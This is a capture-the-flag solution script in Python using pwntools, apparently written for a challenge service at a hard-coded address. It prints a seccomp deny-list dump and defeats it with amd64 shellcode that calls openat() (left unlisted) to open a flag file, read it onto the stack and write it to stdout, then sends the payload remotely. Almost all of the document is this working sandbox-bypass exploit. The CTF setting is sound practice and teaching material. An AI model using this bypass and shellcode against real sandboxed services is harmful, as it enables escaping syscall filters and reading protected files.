Tags: shellcode sandbox seccomp 


```
#! /usr/bin/python3

"""
Filter dump obtained with `./seccomp-tools dump ./filename`:
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x0b 0xc000003e if (A != ARCH_X86_64) goto 0013
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x08 0xffffffff if (A != 0xffffffff) goto 0013
0005: 0x15 0x07 0x00 0x00000002 if (A == open) goto 0013
0006: 0x15 0x06 0x00 0x00000038 if (A == clone) goto 0013
0007: 0x15 0x05 0x00 0x00000039 if (A == fork) goto 0013
0008: 0x15 0x04 0x00 0x0000003a if (A == vfork) goto 0013
0009: 0x15 0x03 0x00 0x0000003b if (A == execve) goto 0013
0010: 0x15 0x02 0x00 0x00000065 if (A == ptrace) goto 0013
0011: 0x15 0x01 0x00 0x00000142 if (A == execveat) goto 0013
0012: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0013: 0x06 0x00 0x00 0x00000000 return KILL

- Some syscalls are blacklisted, but openat() is not, so that one can be
  used instead of the blocked open().
- openat() requires the full path of the file as its argument; the code
  is as follows.
"""

from pwn import *

# The dump above gates on ARCH_X86_64, so assemble for amd64.
context.clear(arch="amd64")

# Payload built from three stages: openat() the flag file, read() it onto the
# stack, write() that buffer to stdout.
# Why openat(): the filter is a deny-list (see module docstring) that kills
# open() but leaves openat() unlisted; any equivalent syscall omitted from a
# deny-list passes, which is why an allow-list is the safer filter design.
# The read() stage hard-codes fd 3, i.e. it assumes only stdin/stdout/stderr
# are open when the payload runs — TODO confirm against the target.
shellcode = "".join(
    (
        shellcraft.linux.openat(-1, "/home/ctf/flag.txt"),
        shellcraft.linux.read(3, "rsp", 80),
        shellcraft.linux.write(1, "rsp", 80),
    )
)

def main():
    """Connect to the challenge service, send the assembled payload, go interactive.

    The connection is opened first, then the module-level ``shellcode`` is
    assembled and sent; ``sendline`` appends a newline after the payload bytes.
    Control is then handed to the user via ``interactive()``.
    """
    conn = remote("20.216.39.14", 1236)
    payload = asm(shellcode)
    conn.sendline(payload)
    conn.interactive()


if __name__ == "__main__":
    main()

```